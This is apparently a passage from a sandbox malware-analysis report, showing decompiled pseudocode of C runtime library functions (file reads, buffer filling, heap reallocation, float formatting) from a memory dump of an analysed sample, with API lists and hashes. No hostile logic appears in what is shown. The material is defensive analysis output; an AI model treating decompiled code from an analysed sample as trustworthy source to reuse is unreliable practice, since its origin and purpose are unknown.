											__eflags = _t138 - 3;
											if(_t138 == 3) {
												_t106 =  *_t149;
												_t149 = _t149 + 1;
												__eflags = _t149;
												 *((char*)( *((intOrPtr*)(0xecf230 + _t105 * 4)) + _t122 + 0x26)) = _t106;
											}
											_t147 = _t149 - _t138;
										}
									} else {
										_t147 =  &(_t147[_t138]);
									}
									goto L54;
								} else {
									 *((intOrPtr*)(E00EAF100())) = 0x2a;
									goto L3;
								}
							} else {
								_t147 =  &(_t147[1]);
								L54:
								_t66 = _t150 - 0x10; // 0xeb2b47
								_t144 =  *_t66;
								_t148 = _t147 - _t144;
								_t142 = MultiByteToWideChar(0xfde9, 0, _t144, _t148,  *(_t150 + 0xc),  *(_t150 - 0x28) >> 1);
								if(_t142 == 0) {
									_t100 = GetLastError();
									E00EAF0DF(_t100);
									L3:
									_t123 = _t122 | 0xffffffff;
									__eflags = _t123;
									_t1 = _t150 - 0x10; // 0xeb2b47
									_t86 =  *_t1;
								} else {
									_t165 = _t142 - _t148;
									_t142 = _t142 + _t142;
									 *( *((intOrPtr*)(0xecf230 +  *(_t150 - 0xc) * 4)) + _t122 + 0x30) = 0 | _t165 != 0x00000000;
									asm("sbb [eax], dh");
									_t75 = _t150 - 0x10; // 0xeb2b47
									_t86 =  *_t75;
									goto L58;
								}
							}
						}
						L59:
						if(_t86 !=  *(_t150 + 0xc)) {
							E00EB2248(_t86);
						}
						if(_t123 != 0xfffffffe) {
							_t142 = _t123;
						}
						_t87 = _t142;
						return _t87;
					}
					goto L33;
					L14:
					if( *(_t150 - 0x14) == 0) {
						goto L29;
					} else {
						_t136 =  *(_t150 - 0xc);
						if(( *( *((intOrPtr*)(0xecf230 + _t136 * 4)) + _t122 + 4) & 0x00000048) == 0) {
							_t23 = _t150 - 0x10; // 0xeb2b47
							__eflags = _t145 -  *_t23;
							if(__eflags != 0) {
								L26:
								L00EB3F56(_t126, __eflags,  *((intOrPtr*)(_t150 + 8)), 0xffffffff, 0xffffffff, 1);
								_t136 =  *(_t150 - 0xc);
								_t152 = _t152 + 0x10;
								_t117 = 0xa;
								__eflags =  *(_t150 - 1) - _t117;
								if( *(_t150 - 1) == _t117) {
									goto L22;
								} else {
									_t126 = 0xd;
									 *_t145 = _t126;
									goto L28;
								}
								goto L59;
							} else {
								_t118 = 0xa;
								__eflags =  *(_t150 - 1) - _t118;
								if(__eflags != 0) {
									goto L26;
								} else {
									 *_t145 = _t118;
									_t145 = _t145 + 1;
									__eflags = _t145;
									L22:
									_push(0xd);
									goto L23;
								}
							}
						} else {
							_t119 = 0xa;
							_push(0xd);
							if( *(_t150 - 1) != _t119) {
								 *_t145 = 0xd;
								_t145 = _t145 + 1;
								 *((char*)( *((intOrPtr*)(0xecf230 + _t136 * 4)) + _t122 + 5)) =  *(_t150 - 1);
							} else {
								 *_t145 = _t119;
								_t145 = _t145 + 1;
							}
							L23:
							_pop(_t126);
						}
					}
					goto L24;
				}
			}






































                0x00ea622b
                0x00ea622b
                0x00ea622b
                0x00ea622b
                0x00eafb65
                0x00eafb65
                0x00eafb6a
                0x00eafb84
                0x00000000
                0x00000000
                0x00eafc0c
                0x00eafc0c
                0x00eafc11
                0x00eafc12
                0x00eafc14
                0x00000000
                0x00eafbdd
                0x00eafb2a
                0x00eafb2c
                0x00eafb2e
                0x00eafc17
                0x00eafc1e
                0x00eafc22
                0x00eafc24
                0x00eafc30
                0x00eafc32
                0x00eafc32
                0x00eafc26
                0x00eafc28
                0x00eafc28
                0x00eafb34
                0x00eafb34
                0x00eafb36
                0x00eafb45
                0x00eafb47
                0x00000000
                0x00eafb49
                0x00eafb49
                0x00eafb4c
                0x00eafb4f
                0x00eafb5e
                0x00eafb60
                0x00eafb62
                0x00eafb51
                0x00eafb53
                0x00eafb54
                0x00eafb57
                0x00eafc09
                0x00eafc09
                0x00eafc09
                0x00eafb4f
                0x00eafb38
                0x00eafb38
                0x00eafb3a
                0x00eafb3b
                0x00eafb3b
                0x00000000
                0x00eafb36
                0x00eafc33
                0x00eafc33
                0x00eafc33
                0x00eafc38
                0x00eafc3e
                0x00eafd49
                0x00eafd49
                0x00eafc4c
                0x00eafc4c
                0x00eafc4d
                0x00eafc51
                0x00eafc59
                0x00eafc5e
                0x00eafc5f
                0x00eafc66
                0x00eafc68
                0x00eafc68
                0x00eafc6b
                0x00eafc6b
                0x00eafc6e
                0x00000000
                0x00000000
                0x00eafc70
                0x00eafc72
                0x00eafc74
                0x00eafc75
                0x00eafc76
                0x00eafc79
                0x00eafc80
                0x00000000
                0x00000000
                0x00eafc80
                0x00000000
                0x00eafc72
                0x00eafc82
                0x00eafc82
                0x00eafc88
                0x00eafc8f
                0x00eafc91
                0x00eafca4
                0x00eafca6
                0x00eafcaf
                0x00eafcb6
                0x00eafcbb
                0x00eafcfa
                0x00eafd00
                0x00eafd05
                0x00eafcbd
                0x00eafcbf
                0x00eafcc0
                0x00eafcc4
                0x00eafcc7
                0x00eafcca
                0x00eafcd3
                0x00eafcd5
                0x00eafcd5
                0x00eafcd6
                0x00eafcda
                0x00eafcda
                0x00eafcdd
                0x00eafce0
                0x00eafce9
                0x00eafceb
                0x00eafceb
                0x00eafcec
                0x00eafcec
                0x00eafcf0
                0x00eafcf0
                0x00eafca8
                0x00eafca8
                0x00eafca8
                0x00000000
                0x00eafc93
                0x00eafc98
                0x00000000
                0x00eafc98
                0x00eafc53
                0x00eafc53
                0x00eafd08
                0x00eafd0b
                0x00eafd0b
                0x00eafd0e
                0x00eafd25
                0x00eafd29
                0x00eafa7c
                0x00eafa83
                0x00eafa89
                0x00eafa89
                0x00eafa89
                0x00eafa8c
                0x00eafa8c
                0x00eafd2f
                0x00eafd34
                0x00eafd39
                0x00eafd42
                0x00eafd44
                0x00eafd46
                0x00eafd46
                0x00000000
                0x00eafd46
                0x00eafd29
                0x00eafc51
                0x00eafd4c
                0x00eafd4f
                0x00eafd52
                0x00eafd57
                0x00eafd5b
                0x00eafd5d
                0x00eafd5d
                0x00eafd5f
                0x00eaffda
                0x00eaffda
                0x00000000
                0x00eafb90
                0x00eafb94
                0x00000000
                0x00eafb96
                0x00eafb96
                0x00eafba5
                0x00eafbca
                0x00eafbca
                0x00eafbcd
                0x00eafbe8
                0x00eafbf1
                0x00eafbf6
                0x00eafbf9
                0x00eafbfe
                0x00eafbff
                0x00eafc02
                0x00000000
                0x00eafc04
                0x00eafc06
                0x00eafc07
                0x00000000
                0x00eafc07
                0x00000000
                0x00eafbcf
                0x00eafbd1
                0x00eafbd2
                0x00eafbd5
                0x00000000
                0x00eafbd7
                0x00eafbd7
                0x00eafbd9
                0x00eafbd9
                0x00eafbda
                0x00eafbda
                0x00000000
                0x00eafbda
                0x00eafbd5
                0x00eafba7
                0x00eafba9
                0x00eafbaa
                0x00eafbaf
                0x00eafbb6
                0x00eafbb9
                0x00eafbc4
                0x00eafbb1
                0x00eafbb1
                0x00eafbb3
                0x00eafbb3
                0x00eafbdc
                0x00eafbdc
                0x00eafbdc
                0x00eafba5
                0x00000000
                0x00eafb94

                APIs
                • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47), ref: 00EAFB7C
                • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47,?,00000080,00000003), ref: 00EAFB86
                • __lseeki64_nolock.LIBCMT ref: 00EAFBF1
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,G+,G+,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00EAFD1F
                • _free.LIBCMT ref: 00EAFD52
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ByteCharErrorFileLastMultiReadWide__lseeki64_nolock_free
                • String ID: G+
                • API String ID: 1844164652-804368800
                • Opcode ID: 21390e061c66065c7d4ee5e22fad37ea63a50d7a5f92c400cc64ffeda891c4a3
                • Instruction ID: 7392e6b12f26c4e0a492a304c54e8623a1ec96900f0ca7c4519a7a573e700583
                • Opcode Fuzzy Hash: 21390e061c66065c7d4ee5e22fad37ea63a50d7a5f92c400cc64ffeda891c4a3
                • Instruction Fuzzy Hash: D221F535A002059FDB11CFE9D884FAEB7B5AF4A714F145075E955FF290CA31A8468B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EAE4C2 Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 71%
                			E00EAE4C2(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00EAE740(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00EAF572(_t98, _t100, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00EAE740(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00EAF100())) = 0x22;
												L4:
												E00EAEB1E();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E00EAF693(_t119));
											_t88 = E00EAF84A();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00EAF6B7(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00EAF100())) = 0x16;
				goto L4;
			}




























                0x00eae4cc
                0x00eae4cf
                0x00eae4d5
                0x00eae4d8
                0x00eae4db
                0x00eae4f8
                0x00000000
                0x00eae4f8
                0x00eae4dd
                0x00eae4e2
                0x00000000
                0x00000000
                0x00eae4e6
                0x00eae501
                0x00eae504
                0x00eae506
                0x00eae514
                0x00eae514
                0x00eae518
                0x00eae520
                0x00eae525
                0x00eae525
                0x00eae528
                0x00eae52a
                0x00000000
                0x00eae52c
                0x00eae52c
                0x00eae534
                0x00eae536
                0x00000000
                0x00000000
                0x00eae538
                0x00eae53b
                0x00eae53e
                0x00eae545
                0x00eae547
                0x00eae54e
                0x00eae549
                0x00eae549
                0x00eae549
                0x00eae553
                0x00eae556
                0x00eae558
                0x00eae641
                0x00000000
                0x00eae55e
                0x00eae55e
                0x00eae55e
                0x00eae565
                0x00eae5a6
                0x00eae5a6
                0x00eae5a8
                0x00eae613
                0x00eae619
                0x00eae61c
                0x00eae673
                0x00000000
                0x00eae679
                0x00eae61e
                0x00eae621
                0x00eae623
                0x00eae649
                0x00eae649
                0x00eae64d
                0x00eae657
                0x00eae65c
                0x00eae664
                0x00eae4f3
                0x00eae4f3
                0x00000000
                0x00eae4f3
                0x00eae625
                0x00eae628
                0x00eae62b
                0x00eae62c
                0x00eae62f
                0x00eae62f
                0x00eae630
                0x00eae633
                0x00eae636
                0x00000000
                0x00eae636
                0x00eae5aa
                0x00eae5ac
                0x00eae5d0
                0x00eae5d5
                0x00eae5db
                0x00eae5dd
                0x00eae5dd
                0x00eae5ae
                0x00eae5b0
                0x00eae5b6
                0x00eae5c8
                0x00eae5c8
                0x00eae5c8
                0x00eae5ca
                0x00eae5b8
                0x00eae5bd
                0x00eae5bf
                0x00eae5bf
                0x00eae5cc
                0x00eae5cc
                0x00eae5df
                0x00eae5e2
                0x00000000
                0x00eae5e4
                0x00eae5e4
                0x00eae5e5
                0x00eae5ef
                0x00eae5f0
                0x00eae5f5
                0x00eae5f8
                0x00eae5fa
                0x00eae681
                0x00000000
                0x00eae681
                0x00eae600
                0x00eae603
                0x00eae66f
                0x00eae66f
                0x00eae66f
                0x00eae66f
                0x00000000
                0x00eae66f
                0x00eae605
                0x00eae605
                0x00eae607
                0x00eae607
                0x00eae60a
                0x00eae60d
                0x00000000
                0x00eae60d
                0x00eae5e2
                0x00eae567
                0x00eae56a
                0x00eae56d
                0x00eae56f
                0x00000000
                0x00000000
                0x00eae571
                0x00000000
                0x00000000
                0x00eae577
                0x00eae579
                0x00eae57b
                0x00eae57d
                0x00eae57d
                0x00eae580
                0x00eae583
                0x00eae585
                0x00000000
                0x00eae58b
                0x00eae592
                0x00eae597
                0x00eae59a
                0x00eae59d
                0x00eae5a0
                0x00eae5a2
                0x00000000
                0x00eae5a2
                0x00eae639
                0x00eae639
                0x00eae639
                0x00000000
                0x00eae55e
                0x00eae558
                0x00eae52a
                0x00eae50d
                0x00eae510
                0x00eae512
                0x00000000
                0x00000000
                0x00000000
                0x00eae512
                0x00eae4e8
                0x00eae4ed
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                • String ID:
                • API String ID: 1559183368-0
                • Opcode ID: 171d78fe311667b55df2c2311e6a58e3fdb198e453ef8cd83bddfebc46ad80a8
                • Instruction ID: 8e7d763c938ff3aabbd027699c607b274108f893b075d8a543be975250439fd3
                • Opcode Fuzzy Hash: 171d78fe311667b55df2c2311e6a58e3fdb198e453ef8cd83bddfebc46ad80a8
                • Instruction Fuzzy Hash: 1051B830E003059BDB289FA998845AE77A5AF5E328F149729F435BE3D0E770BD509B50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA600E Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                Download Yara Rule
                C-Code - Quality: 81%
                			E00EA600E(void* __edx, void* __edi, void* __esi) {
				long _t33;
				signed int _t40;
				signed int _t43;
				signed char _t45;
				void* _t47;
				signed int _t52;
				void* _t54;
				signed int _t56;
				void* _t57;
				void* _t60;
				signed int _t61;
				void* _t62;

				_t60 = __esi;
				_t57 = __edi;
				_t54 = __edx;
				asm("in al, 0x0");
				_t45 = 0;
				if(( *(_t62 + 0xc) & 0x00000008) != 0) {
					_t45 = 0x20;
				}
				if(( *(_t62 + 0xc) & 0x00004000) != 0) {
					_t45 = _t45 | 0x00000080;
				}
				if(( *(_t62 + 0xc) & 0x00000080) != 0) {
					_t45 = _t45 | 0x00000010;
				}
				_t33 = GetFileType( *(_t62 + 8));
				if(_t33 != 0) {
					__eflags = _t33 - 2;
					if(__eflags != 0) {
						__eflags = _t33 - 3;
						if(__eflags == 0) {
							_t45 = _t45 | 0x00000008;
							__eflags = _t45;
						}
					} else {
						_t45 = _t45 | 0x00000040;
					}
					_t61 = E00EB3A06(_t45, _t47, _t54, _t57, _t60, __eflags);
					 *(_t62 + 0xc) = _t61;
					__eflags = _t61 - 0xffffffff;
					if(_t61 != 0xffffffff) {
						 *(_t62 - 4) =  *(_t62 - 4) & 0x00000000;
						E00EB3DB2(_t61,  *(_t62 + 8));
						_t56 = _t61 >> 5;
						_t52 = (_t61 & 0x0000001f) << 6;
						 *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 4) = _t45 | 0x00000001;
						 *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) =  *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) & 0x00000080;
						 *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) =  *(_t52 +  *((intOrPtr*)(0xecf230 + _t56 * 4)) + 0x24) & 0x0000007f;
						 *((intOrPtr*)(_t62 - 0x1c)) = 1;
						 *(_t62 - 4) = 0xfffffffe;
						E00EB3D8D(1, _t61);
						__eflags = 1;
						if(1 == 0) {
							_t61 = _t61 | 0xffffffff;
							__eflags = _t61;
						}
						_t40 = _t61;
					} else {
						 *((intOrPtr*)(E00EAF100())) = 0x18;
						_t43 = E00EAF0CC();
						 *_t43 =  *_t43 & 0x00000000;
						goto L9;
					}
				} else {
					_t43 = E00EAF0DF(GetLastError());
					L9:
					_t40 = _t43 | 0xffffffff;
				}
				return E00EAF225(_t40);
			}















                0x00ea600e
                0x00ea600e
                0x00ea600e
                0x00eb3caa
                0x00eb3cac
                0x00eb3cb2
                0x00eb3cb4
                0x00eb3cb4
                0x00eb3cbe
                0x00eb3cc0
                0x00eb3cc0
                0x00eb3cc7
                0x00eb3cc9
                0x00eb3cc9
                0x00eb3ccf
                0x00eb3cd7
                0x00eb3cee
                0x00eb3cf1
                0x00eb3cf8
                0x00eb3cfb
                0x00eb3cfd
                0x00eb3cfd
                0x00eb3cfd
                0x00eb3cf3
                0x00eb3cf3
                0x00eb3cf3
                0x00eb3d05
                0x00eb3d07
                0x00eb3d0a
                0x00eb3d0d
                0x00eb3d24
                0x00eb3d2c
                0x00eb3d38
                0x00eb3d40
                0x00eb3d4a
                0x00eb3d55
                0x00eb3d61
                0x00eb3d69
                0x00eb3d6c
                0x00eb3d73
                0x00eb3d78
                0x00eb3d7a
                0x00eb3d7c
                0x00eb3d7c
                0x00eb3d7c
                0x00eb3d7f
                0x00eb3d0f
                0x00eb3d14
                0x00eb3d1a
                0x00eb3d1f
                0x00000000
                0x00eb3d1f
                0x00eb3cd9
                0x00eb3ce0
                0x00eb3ce6
                0x00eb3ce6
                0x00eb3ce6
                0x00eb3d86

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                • String ID:
                • API String ID: 43408053-0
                • Opcode ID: 848f810a2aa95084b9e8040f56c7cc9ff3325a041b0ff3dad74caf40290ba2d4
                • Instruction ID: 5672838568ea7ded5549dae1e5e3344575c7a96a7a6ffa5ebd023d4cb67f6592
                • Opcode Fuzzy Hash: 848f810a2aa95084b9e8040f56c7cc9ff3325a041b0ff3dad74caf40290ba2d4
                • Instruction Fuzzy Hash: C6213E315065015ECB219B79DC077DABF905F01338F28A719E8A07B2E3CB3597069F50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB6902 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 95%
                			E00EB6902(void* __ebx, void* __ecx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t32;

				if(_a4 != 0) {
					_t32 = _a8;
					if(_t32 != 0) {
						_push(__ebx);
						while(_t32 <= 0xffffffe0) {
							if(_t32 == 0) {
								_t32 = _t32 + 1;
							}
							_t7 = HeapReAlloc( *0xecf22c, 0, _a4, _t32);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0xed0060 == _t7) {
									_t9 = E00EAF100();
									 *_t9 = E00EAF159(GetLastError());
									goto L17;
								} else {
									if(E00EB4C7E(_t7, _t32) == 0) {
										_t12 = E00EAF100();
										 *_t12 = E00EAF159(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00EB4C7E(_t6, _t32);
						 *((intOrPtr*)(E00EAF100())) = 0xc;
						goto L12;
					} else {
						E00EB2248(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00EB6870(__ebx, __ecx, __edx, __edi, _a8);
				}
			}









                0x00eb6909
                0x00eb6917
                0x00eb691c
                0x00eb692b
                0x00eb695e
                0x00eb6930
                0x00eb6932
                0x00eb6932
                0x00eb693f
                0x00eb6945
                0x00eb6949
                0x00eb69a9
                0x00eb69a9
                0x00eb694b
                0x00eb6951
                0x00eb6993
                0x00eb69a7
                0x00000000
                0x00eb6953
                0x00eb695c
                0x00eb697b
                0x00eb698f
                0x00eb6975
                0x00eb6975
                0x00000000
                0x00000000
                0x00000000
                0x00eb695c
                0x00eb6951
                0x00000000
                0x00eb6977
                0x00eb6964
                0x00eb696f
                0x00000000
                0x00eb691e
                0x00eb6921
                0x00eb6927
                0x00eb6927
                0x00eb6978
                0x00eb697a
                0x00eb690b
                0x00eb6915
                0x00eb6915

                APIs
                • _malloc.LIBCMT ref: 00EB690E
                  • Part of subcall function 00EB6870: __FF_MSGBANNER.LIBCMT ref: 00EB6887
                  • Part of subcall function 00EB6870: __NMSG_WRITE.LIBCMT ref: 00EB688E
                  • Part of subcall function 00EB6870: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00EB22DE,00000000,00000000,00000000,00000000,?,00EB2193,00000018,00ECC228), ref: 00EB68B3
                • _free.LIBCMT ref: 00EB6921
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: AllocHeap_free_malloc
                • String ID:
                • API String ID: 2734353464-0
                • Opcode ID: b9308b57d57c78fb18ec6cf5c098717c595fc83990a99a0ee6aa0dc77a91db29
                • Instruction ID: bb3493447c2ffea952990fc9110f13710d528ae5e3e5da6c679e0dda08395ac7
                • Opcode Fuzzy Hash: b9308b57d57c78fb18ec6cf5c098717c595fc83990a99a0ee6aa0dc77a91db29
                • Instruction Fuzzy Hash: DE110A32405215EFCB212FB0FC057EB3BD4AF553A4F206539FA45FE161DB3988408691
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EC2241 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00EC2241(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00EC27B0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00EC22E5(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00EC2A64(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00EC2985(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                0x00ec2244
                0x00ec224a
                0x00ec22bd
                0x00000000
                0x00ec2251
                0x00ec2251
                0x00ec2254
                0x00ec226f
                0x00ec2272
                0x00ec2292
                0x00ec22a4
                0x00ec2274
                0x00ec2274
                0x00ec2277
                0x00000000
                0x00ec2279
                0x00ec228b
                0x00ec228b
                0x00ec2277
                0x00ec22c2
                0x00ec22c6
                0x00ec2256
                0x00ec226e
                0x00ec226e
                0x00ec2254

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 292b7bd2d9c99b2bb16a839906547967230dbf570db0668fca305cc88826b2c5
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
